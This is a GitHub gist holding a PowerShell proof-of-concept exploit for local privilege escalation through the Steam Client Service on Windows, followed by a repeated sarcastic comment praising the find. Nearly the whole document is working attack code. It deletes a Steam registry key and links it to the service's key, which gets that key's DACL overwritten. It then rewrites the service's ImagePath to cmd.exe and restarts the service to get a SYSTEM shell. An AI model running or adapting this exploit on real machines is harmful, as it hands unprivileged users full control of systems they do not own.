-
-
Save enigma0x3/03f065be011c5980b96855e2741bf302 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Write-Host "[*] Installing NTObjectManager..." | |
install-module NTObjectManager -Scope CurrentUser -Force | |
import-module NTObjectManager | |
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" | |
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" | |
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" | |
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service") | |
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service" | |
Get-Service "Steam Client Service" | Restart-Service | |
Write-Host "[*] Sleeping 5 seconds" | |
Start-Sleep 5 | |
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten" | |
Write-Host "[*] Modifying the binPath on the Steam Client Service..." | |
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe" | |
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it" | |
Get-Service "Steam Client Service" | Restart-Service | |
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM" | |
Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.